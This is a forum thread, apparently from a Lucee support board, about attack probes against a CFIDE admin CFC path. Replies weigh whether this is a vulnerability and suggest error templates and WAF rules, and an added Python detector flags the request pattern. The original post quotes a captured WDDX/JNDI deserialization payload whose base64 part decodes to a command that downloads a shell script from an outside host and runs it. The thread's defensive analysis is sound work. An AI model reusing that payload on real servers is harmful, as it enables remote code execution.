Web site attack vulnerability? onCFCRequest

Like most web sites, mine is often hit with attacks probing for vulnerabilities. Normally these result in 404 errors.

Recently I have had some try and load /CFIDE/adminapi/base.cfc
There is no such folder and when I try that folder, I get a custom 404 error page and no Lucee error. However, I have also caught this Lucee error when the attacker at 213.109.147.242 loaded the page.

lucee.runtime.interpreter.InterpreterException: Syntax Error, Invalid Construct at line [1] / column [1] / position [1] in the JSON 1: <wddxPacket version='1.0'><header/><data><struct type='Ecom.sun.rowset.JdbcRowSetImplE'><var name='dataSourceName'><string>ldap://166.108.229.166:8089/CommonsBeanutils1/base64/KGN1cmwgLXNTZmsgaHR0cDovLzE2Ni4xMDguMjI5LjE2Njo4MDg4L3NlcnZpY2Uuc2ggfHwgd2dldCAtcSAtTy0gaHR0cDovLzE2Ni4xMDguMjI5LjE2Njo4MDg4L3NlcnZpY2Uuc2gpIHwgc2g=</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket> ^ at lucee.runtime.interpreter.CFMLExpressionInterpreter.createSyntaxException(CFMLExpressionInterpreter.java:285)

My question is, how can Lucee have an error on a non-existent page, and is this a Lucee vulnerability?

OS: Windows Server 2025
Java Version: 21.0.6
Tomcat Version: 9.0.104
Lucee Version: 6.2.0.321

Can you DM me the full stacktrace?

Both the JSON and WDDX processing paths have been recently security reviewed, so this shouldn’t be a problem, but the team will review this.

1 Like

Do you expose any CFCs to the public? If not, you may want to consider using web server or WAF rules to explicitly block access, or any bogus request for a non-existent CFC will return an error message and potentially expose sensitive information (paths, internal IPs, etc.).

A properly locked down Internet-facing server should be using an error template which reveals no details about any error, i.e. error-public.cfm

1 Like
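Added example (not part of any post in this thread, and not Lucee or WAF vendor code): a small Python check that flags the request shape shown in the stack trace above, a WDDX packet whose struct names a Java class and whose string value is a JNDI-style URL, sent to a `/CFIDE/` CFC path. The sample requests, the class name `com.example.RowSetImpl`, the addresses and the finding labels are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Patterns for the probe shape seen in the thread's stack trace.
WDDX_RE = re.compile(r"<wddxPacket\b", re.I)
STRUCT_TYPE_RE = re.compile(r"<struct\s+type\s*=\s*['\"]([^'\"]+)['\"]", re.I)
JNDI_RE = re.compile(r"<string>\s*((?:ldaps?|rmi|dns|iiop)://[^<\s]+)", re.I)
CFIDE_CFC_RE = re.compile(r"^/CFIDE/.*\.cfc$", re.I)


def inspect_request(path, body):
    """Return a list of finding strings for one request (empty list = clean)."""
    findings = []
    text = unquote_plus(body or "")  # form bodies arrive URL-encoded
    if CFIDE_CFC_RE.match(path.split("?", 1)[0]):
        findings.append("cfide-cfc-path")
    if WDDX_RE.search(text):
        findings.append("wddx-packet")
        for cls in STRUCT_TYPE_RE.findall(text):
            # A dotted type names a Java class to instantiate, not plain data.
            if "." in cls:
                findings.append("typed-struct:" + cls)
        for url in JNDI_RE.findall(text):
            # Record scheme and host only; the URL path may carry a payload.
            scheme, rest = url.split("://", 1)
            host = rest.split("/", 1)[0]
            findings.append("jndi-url:%s://%s" % (scheme.lower(), host))
    return findings


# Constructed sample requests (documentation addresses, no real payload).
SAMPLES = [
    ("/CFIDE/adminapi/base.cfc",
     "argumentCollection=%3CwddxPacket+version%3D%271.0%27%3E%3Cheader%2F%3E"
     "%3Cdata%3E%3Cstruct+type%3D%27com.example.RowSetImpl%27%3E"
     "%3Cvar+name%3D%27dataSourceName%27%3E"
     "%3Cstring%3Eldap%3A%2F%2F192.0.2.10%3A1389%2FPLACEHOLDER%3C%2Fstring%3E"
     "%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E"),
    ("/api/orders.cfc?method=list", 'argumentCollection={"page":1}'),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, "->", inspect_request(path, body) or "clean")
```

The same patterns can be translated into web server or WAF rules; running them over logged request bodies first shows how often legitimate traffic would match.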

I modified the onCFCRequest function in application.cfc as advised towards the end of this page https://blog.adamcameron.me/2013/04/its-easy-to-create-security-hole-in.html

That approach is only needed if you are overriding the default behaviour?

I did some investigation about this. Lucee could be returning better HTTP status codes here, but there is no vulnerability here, just some error logging.

The only chance of revealing information about your server is if you don’t have error handling / an error template in place?

It’s effectively no different than the exception calling the path to a missing .cfm file; it’s just that remote CFCs support argumentCollection and Lucee only supports JSON, whereas ACF also supports WDDX (which led to several of their CVEs over the years; Lucee’s WDDX support is much leaner than ACF’s and not vulnerable).

component {
	this.name = "ldev5530";
	function onCFCRequest(){
		// no op
	}

	function onError(){
		echo("oops");
	}
}

https://luceeserver.atlassian.net/browse/LDEV-5530

1 Like

Thank you for the investigation and advice. I do have custom error and 404 error pages and not the default pages.

1 Like